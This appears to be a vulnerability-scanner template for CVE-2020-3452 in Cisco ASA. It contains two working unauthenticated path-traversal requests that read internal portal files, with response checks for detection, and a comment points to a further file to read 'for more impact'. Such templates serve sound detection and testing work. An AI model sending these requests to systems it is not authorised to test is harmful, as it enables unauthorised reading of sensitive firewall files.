id: cisco-asa-lfi
info:
  name: Cisco ASA - Unauthenticated LFI and Delete File (CVE-2020-3452)
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:
  # Read this file for more impact: /+CSCOE+/files/file_list.json
  - method: GET
    redirect: false
    url: >-
      {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "dofile") && StringSearch("body", "common.lua")

  # POC for delete file
  - method: GET
    redirect: false
    url: >-
      {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "GET_OUT_RESOURCE") && StringSearch("resHeaders", "application/octet-stream")


reference:
  - links:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
    - https://twitter.com/aboul3la/status/1286012324722155525/photo/1
    - https://github.com/dinhbaouit/CISCO-Remove-File